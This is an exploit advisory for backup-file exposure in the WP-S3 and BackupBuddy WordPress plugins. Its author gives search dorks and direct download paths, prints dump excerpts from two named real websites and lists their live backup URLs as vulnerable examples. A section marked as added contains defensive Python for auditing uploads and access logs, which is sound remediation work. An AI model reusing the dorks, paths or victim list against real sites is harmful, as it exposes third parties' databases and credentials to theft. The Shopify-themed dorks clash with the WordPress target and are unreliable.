
WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure

Author: KingSkrupellos, Published: 21-12-2018
#################################################################################################

# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
+ intext:''Powered by Shopify''
+ intext:© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
+ intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]
CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/uploads/wp-s3-database-backup.sql

/wp-content/uploads/wp-s3-backups.zip
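
The two paths above are static file names inside the web-served uploads directory, so a site owner can verify exposure without guessing. The following is an added example written for this page (it is not part of the original advisory and not code from the WP-S3 or BackupBuddy plugins). It provides two defensive checks: a filesystem audit that flags backup artifacts left under any `wp-content/uploads` tree, including sites installed in a sub-directory such as `/blog/`, and an access-log scan that reports successful downloads of those artifacts. It assumes Apache/nginx Common Log Format for the log lines and treats any file ending in `.sql`, `.sql.gz` or `.sql.zip` under uploads as a dump (a policy assumption); the file list and log lines are constructed for the example.

```python
"""Defensive checks for the backup-file exposure described in this advisory.

Added example, not part of the original advisory. Two audits a site owner or
responder would run:
  1. find_exposed_backups(): filter a listing of paths under the WordPress web
     root down to backup artifacts left inside wp-content/uploads.
  2. detect_backup_downloads(): scan web-server access logs (Common Log Format)
     for successful fetches of those artifacts.
The sample file list and log lines are constructed for this example.
"""
import re
from typing import Iterable, List, Tuple

# File names the advisory reports as reachable under wp-content/uploads.
KNOWN_BACKUP_ARTIFACTS = {"wp-s3-database-backup.sql", "wp-s3-backups.zip"}

# Suffixes that identify a database dump regardless of its name.
# Policy assumption for this example: nothing with these suffixes belongs in uploads.
DUMP_SUFFIXES = (".sql", ".sql.gz", ".sql.zip")


def is_uploads_backup(path: str) -> bool:
    """True if `path` points at a backup artifact inside a wp-content/uploads tree.

    Works for both web-root-relative filesystem paths and HTTP request paths,
    including sites installed in a sub-directory such as /blog/wp-content/uploads/...
    """
    path = path.split("?", 1)[0]  # drop any query string
    parts = [p for p in path.split("/") if p]
    for i in range(len(parts) - 2):  # need at least one component after "uploads"
        if parts[i] == "wp-content" and parts[i + 1] == "uploads":
            name = parts[-1].lower()
            return name in KNOWN_BACKUP_ARTIFACTS or name.endswith(DUMP_SUFFIXES)
    return False


def find_exposed_backups(paths: Iterable[str]) -> List[str]:
    """Filter a listing of web-root-relative paths down to exposed backup artifacts."""
    return [p for p in paths if is_uploads_backup(p)]


# Apache/nginx Common Log Format; only the fields needed here are captured.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def detect_backup_downloads(log_lines: Iterable[str]) -> List[Tuple[str, str, int]]:
    """Return (client_ip, path, status) for every 2xx GET of a backup artifact.

    A 403/404 for the same path is not reported: the server refused the request,
    which is the desired state once access to these files has been blocked.
    """
    hits = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # malformed or non-CLF line; skip rather than fail
        status = int(m.group("status"))
        if (m.group("method") == "GET" and 200 <= status < 300
                and is_uploads_backup(m.group("path"))):
            hits.append((m.group("ip"), m.group("path"), status))
    return hits


# Constructed sample data (not taken from any real site).
SAMPLE_FILES = [
    "wp-content/uploads/2018/12/logo.png",
    "wp-content/uploads/wp-s3-database-backup.sql",
    "wp-content/uploads/wp-s3-backups.zip",
    "wp-content/plugins/wp-s3/readme.txt",
    "wp-content/uploads/backups/site-2018-12-17.sql.gz",
]

SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [17/Dec/2018:10:12:01 +0000] "GET /wp-content/uploads/wp-s3-database-backup.sql HTTP/1.1" 200 4812033',
    '203.0.113.5 - - [17/Dec/2018:10:12:09 +0000] "GET /wp-content/uploads/wp-s3-backups.zip HTTP/1.1" 403 199',
    '198.51.100.7 - - [17/Dec/2018:10:13:44 +0000] "GET /wp-content/uploads/2018/12/logo.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Dec/2018:10:14:00 +0000] "GET /blog/wp-content/uploads/wp-s3-database-backup.sql HTTP/1.1" 200 9912',
]

if __name__ == "__main__":
    for p in find_exposed_backups(SAMPLE_FILES):
        print("exposed artifact:", p)
    for ip, path, status in detect_backup_downloads(SAMPLE_LOG_LINES):
        print(f"downloaded by {ip}: {path} ({status})")
```

On a real server the path list would come from walking the web root, and the log lines from the access log; any hit from `detect_backup_downloads` means the dump was already retrieved and the credentials and hashes it contains should be treated as compromised. The durable fix is to keep backups outside the web root, or to have the web server deny requests for these paths, after which the same scan should show only 403/404 responses.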

#################################################################################################

# Example SQL Dump Information and Table Names => holysparks.org

-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log

-- Table structure for table `wp_StreamPad_Tracks`

-- Dumping data for table `wp_StreamPad_Tracks`

-- Table structure for table `wp_affiliates_banners_tbl`

-- Dumping data for table `wp_affiliates_banners_tbl`

-- Table structure for table `wp_affiliates_clickthroughs_tbl`

-- Dumping data for table `wp_affiliates_clickthroughs_tbl`

-- Table structure for table `wp_affiliates_leads_tbl`

-- Dumping data for table `wp_affiliates_leads_tbl`

-- Table structure for table `wp_affiliates_payouts_tbl`

-- Dumping data for table `wp_affiliates_payouts_tbl`

-- Table structure for table `wp_affiliates_sales_tbl`

-- Dumping data for table `wp_affiliates_sales_tbl`

-- Table structure for table `wp_affiliates_tbl`

-- Dumping data for table `wp_affiliates_tbl`

-- Table structure for table `wp_commentmeta`

-- Dumping data for table `wp_commentmeta`

-- Table structure for table `wp_comments`

-- Dumping data for table `wp_comments`

-- Table structure for table `wp_contact_form_7`

-- Dumping data for table `wp_contact_form_7`

-- Table structure for table `wp_ft_wpecards`

-- Dumping data for table `wp_ft_wpecards`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed....

################################################################################################

# Example SQL Dump Information and Table Names => the-schmidt.com

-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log

-- Table structure for table `wp_PluginManager`

-- Dumping data for table `wp_PluginManager`

-- Table structure for table `wp_custom_fonts`

-- Dumping data for table `wp_custom_fonts`

-- Table structure for table `wp_cvg_gallery`

-- Dumping data for table `wp_cvg_gallery`

-- Table structure for table `wp_cvg_videos`

-- Dumping data for table `wp_cvg_videos`

-- Table structure for table `wp_download_status`

-- Dumping data for table `wp_download_status`

-- Table structure for table `wp_fancybox`

-- Dumping data for table `wp_fancybox`

-- Table structure for table `wp_item_category_associations`

-- Dumping data for table `wp_item_category_associations`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_ngg_album`

-- Dumping data for table `wp_ngg_album`

-- Table structure for table `wp_ngg_gallery`

-- Dumping data for table `wp_ngg_gallery`

-- Table structure for table `wp_ngg_pictures`

-- Dumping data for table `wp_ngg_pictures`

-- Table structure for table `wp_also_bought_product`

-- Dumping data for table `wp_also_bought_product`

-- Table structure for table `wp_blc_filters`

-- Dumping data for table `wp_blc_filters`

-- Table structure for table `wp_blc_instances`

-- Dumping data for table `wp_blc_instances`

-- Table structure for table `wp_blc_links`

-- Dumping data for table `wp_blc_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed...

#################################################################################################

# Example Vulnerable Sites =>

[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql

[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
